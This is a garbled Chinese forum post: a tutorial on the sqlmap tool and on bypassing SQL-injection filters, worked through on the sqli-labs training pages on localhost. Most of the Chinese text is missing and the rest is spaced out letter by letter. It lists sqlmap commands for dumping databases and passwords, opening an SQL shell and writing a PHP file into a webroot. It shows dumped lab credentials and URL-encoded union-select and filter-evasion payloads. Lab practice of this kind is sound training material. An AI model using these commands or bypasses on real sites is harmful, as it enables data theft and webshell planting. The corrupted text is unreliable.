[18113] 2020-08-13_SQLMap和SQLi注入防御

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2020-08-13_SQLMap和SQLi注入防御 S Q L M a p S Q L i z h i j i a n   H A C K   2 0 2 0 - 0 8 - 1 3 : S q l m a p 使 使 1 . 1   s q l m a p 1 .   s q l , , s q l m a p s q l , . 2 .   s q l m a p ( 1 ) # s q l m a p S Q L 访 :   s q l m a p . o r g   ( 2 ) # M y S Q L O r a c l e ,   P o s t g r e S Q L ,   M i c r o s o f t   S Q L   S e r v e r ,   M i c r o s o f t A c c e s s ,   I B M   D B 2 ,   S Q L i t e ,   F i r e b i r d ,   S y b a s e   a n d   S A P   M A X D B ( 3 ) # # U N I O N   q u e r y   S Q L   i n j e c t i o n # E r r o r - b a s e d   S Q L   i n j e c t i o n # B o o l e a n - b a s e d   b l i n d   S Q L   i n j e c t i o n # T i m e - b a s e d   b l i n d   S Q L   i n j e c t i o n # S t a c k e d   q u e r i e s   S Q L   i n j e c t i o n 1 . 2   s q l m a p
1 . s q l m a p       ( 1 ) p y t h o n - - - > s q l m a p p y t h o n           p y t h o n :   h t t p s : / / w w w . p y t h o n . o r g / d o w n l o a d s / r e l e a s e / p y t h o n - 2 7 1 5 / )       s q l m a p P y t h o n 2 . X . ( p y t h o n , s q l m a p , C : U s e r s A d m i n i s t r a t o r p y t h o n , s q l m a p 便 )       ( 2 ) P y t h o n , P y t h o n .
    ( 3 ) s q l m a p , C : U s e r s A d m i n i s t r a t o r s q l m a p       ( 4 ) p y t h o n :     c m d , p y t h o n ,       C : U s e r s A d m i n i s t r a t o r > p y t h o n       P y t h o n   2 . 7 . 1 6   ( v 2 . 7 . 1 6 : 4 1 3 a 4 9 1 4 5 e ,   M a r     4   2 0 1 9 ,   0 1 : 3 7 : 1 9 )   [ M S C   v . 1 5 0 0   6 4   b i t   ( A M D 6 4 ) ]   o n   w i n 3 2       T y p e   " h e l p " ,   " c o p y r i g h t " ,   " c r e d i t s "   o r   " l i c e n s e "   f o r   m o r e   i n f o r m a t i o n .         > > >   e x i t ( ) ;             ( 5 ) s q l m a p :     c m d , s q l m a p . p y     - h   ( )     C : U s e r s A d m i n i s t r a t o r s q l m a p > s q l m a p . p y     - h       #
1 . 3   s q l m a p # ( 1 ) , , - - d b s       # - - d b m s       m y s q l     # - - u s e r s       # ( ) - - p a s s w o r d s     # , ( ) - - t e c h n i q u e     # 使 - - c u r r e n t - d b   # - - b a n n e r               # - D   d a t a b a s e _ n a m e   - - t a b l e s         # - D , - - t a b l e s - D   d a t a b a s e _ n a m e   - T   t a b l e _ n a m e   - - c o l u m n s   # - T , - - c o l u m n s - D   d a t a b a s e _ n a m e   - T   t a b l e _ n a m e   - C   c o l u m n _ 1 , c o l u m n _ 2   - - d u m p                                 # - C , - - d u m p - - u s e r s       # , - - c u r r e n t - u s e r     # - - i s - d b a               # T r u e - - p r i v i l e g e s       # s q l m a p - U     - - p r o x y       #   e g :   p r o x y   h t t p : / / l o c a l : 8 0 8 0 # ( 2 ) :
# s q l m a p , s e l e c t   *   f r o m   u s e r s   w h e r e   i d = ( ( ( ' 1 ' ) ) )   a n d   1 = 1 # - - p r e f i x = P R E F I X   p a y l o a d # s u f f i x = S U F F I X     p a y l o a d e g s q l m a p   - u   w w w . t a r g e t . c o m / i n d e x . p h p ? i d = 1   - p   i d   - - p r e f i x   ' ) ) - - s u f f i x   A N D   ( ' 1 ' = ' 1 # ( 3 ) : s q l m a p   - u   w w w . a . c o m / 1 . p h p ? i d = 1   - - f i l e - w r i t e = d : / 1 . t x t - - f i l e - d e s t = E / w w w r o o t / w e b / o n e . p h p - - b a t c h   - - s t a r t =   - - s t o p = - - d u m p   - - d u m p - a l l   - - p u r g e - o u t p u t /   - - p u r g e     - - s q l - s h e l l   s q l s h e l l , s q l     . s q l m a p   s q l m a p 1 . 4   s q l m a p # L e s s - 1 - - L e s s 6 5 ( , ) # ( 1 ) C : U s e r s A d m i n i s t r a t o r s q l m a p > p y t h o n   s q l m a p . p y   - u   " h t t p : / / l o c a l h o s t / s q l i / L e s s - 1 ? i d = 1 "   - - d b s   - - d b m s = m y s q l   - - b a t c h # : - u   u r l , u r l - - d b s - - d b m s m y s q l - - b a t c h - D     s e c u r i t y   - - t a b l e s   s e c u r i t y   - D     s e c u r i t y   - T     u s e r s   - - c o l u m n s   s e c u r i t y u s e r s - D   s e c u r i t y   - T   u s e r s   - C   u s e r n a m e , p a s s w o r d   - - d u m p     # s e c u r i t y , u s e r s u s e r n a m e p a s s w o r d , - - d u m p
# : [ * ]   c h a l l e n g e s [ * ]   d v w a [ * ]   i n f o r m a t i o n _ s c h e m a [ * ]   m y s q l [ * ]   o w a s p [ * ]   p e r f o r m a n c e _ s c h e m a [ * ]   s e c u r i t y [ * ]   t e s t # ( 2 ) C : U s e r s A d m i n i s t r a t o r s q l m a p > p y t h o n   s q l m a p . p y   - u   " h t t p : / / l o c a l h o s t / s q l i / L e s s - 1 ? i d = 1 "   - - c u r r e n t - d b   - - b a t c h # : c u r r e n t   d a t a b a s e :         ' s e c u r i t y ' # ( 3 ) C : U s e r s A d m i n i s t r a t o r s q l m a p > p y t h o n   s q l m a p . p y   - u   " h t t p : / / l o c a l h o s t / s q l i / L e s s - 1 ? i d = 1 "   - D   s e c u r i t y   - - t a b l e s   - - b a t c h # : D a t a b a s e :   s e c u r i t y [ 4   t a b l e s ] + - - - - - - - - - - + |   e m a i l s       | |   r e f e r e r s   | |   u a g e n t s     | |   u s e r s         | + - - - - - - - - - - + # ( 4 ) C : U s e r s A d m i n i s t r a t o r s q l m a p > p y t h o n   s q l m a p . p y   - u   " h t t p : / / l o c a l h o s t / s q l i / L e s s - 1 ? i d = 1 "   - D   s e c u r i t y   - T   u s e r s   - - c o l u m n s     - - b a t c h
# : D a t a b a s e :   s e c u r i t y T a b l e :   u s e r s [ 3   c o l u m n s ] + - - - - - - - - - - + - - - - - - - - - - - - - + |   C o l u m n       |   T y p e                 | + - - - - - - - - - - + - - - - - - - - - - - - - + |   i d               |   i n t ( 3 )             | |   p a s s w o r d   |   v a r c h a r ( 2 0 )   | |   u s e r n a m e   |   v a r c h a r ( 2 0 )   | + - - - - - - - - - - + - - - - - - - - - - - - - + # ( 5 ) u s e r s u s e r n a m e p a s s w o r d C : U s e r s A d m i n i s t r a t o r s q l m a p > p y t h o n   s q l m a p . p y   - u   " h t t p : / / l o c a l h o s t / s q l i / L e s s - 1 ? i d = 1 "   - D   s e c u r i t y   - T   u s e r s   - C   u s e r n a m e , p a s s w o r d   - - d u m p     - - b a t c h # : D a t a b a s e :   s e c u r i t y T a b l e :   u s e r s [ 1 3   e n t r i e s ] + - - - - - - - - - - + - - - - - - - - - - - - + |   u s e r n a m e   |   p a s s w o r d       | + - - - - - - - - - - + - - - - - - - - - - - - + |   D u m b           |   D u m b               | |   A n g e l i n a   |   I - k i l l - y o u   | |   D u m m y         |   p @ s s w o r d       | |   s e c u r e       |   c r a p p y           | |   s t u p i d       |   s t u p i d i t y     | |   s u p e r m a n   |   g e n i o u s         | |   b a t m a n       |   m o b ! l e           | |   a d m i n         |   a d m i n             | |   a d m i n 1       |   a d m i n 1           | |   a d m i n 2       |   a d m i n 2           | |   a d m i n 3       |   a d m i n 3           | |   d h a k k a n     |   d u m b o             | |   a d m i n 4       |   a d m i n 4           | + - - - - - - - - - - + - - - - - - - - - - - - + : s q l i w a f
2 . 1   S Q L w a f : , .   使 使 , . 1 . s q l , s q l ? # ( 1 ) # ( 2 ) a n d o r # ( 3 ) s e l e c t u n i o n # ( 4 ) 2 . a n d / o r ? # ( 1 ) m y s q l , ; = = = > 使 # ( 2 ) m y s q l , 1 6 U R L ; # ( 3 )       = = = >   a n d ( & & )     o r ( | | ) # ( 4 ) = = = > a / * * / n d       o O R r 3 . , , .       w a f , w a f s q l . 2 . 2   s q l w a f 1 . ( L e s s - 2 3 ) # ( 1 ) : S Q L S Q L     - - +     - -       # / *     * / # ( 2 ) p r e g _ r e p l a c e p r e g _ r e p l a c e ( m i x e d   $ p a t t e r n   ,   m i x e d   $ r e p l a c e m e n t   ,   m i x e d   $ s u b j e c t ) : $ p a t t e r n :   $ r e p l a c e m e n t :   $ s u b j e c t :  
# ( 3 ) :     o r   ' 1 ' = ' 1 h t t p : / / 1 2 7 . 0 . 0 . 1 / s q l i / L e s s - 2 3 / ? i d = - 1 % 2 7 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , d a t a b a s e ( ) , % 2 7 3 2 . a n d o r ? ( L e s s - 2 5 ) ( 1 ) : o r a n d ( 2 )
3 . ? ( L e s s - 2 6 ) ( 1 ) % 0 a
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则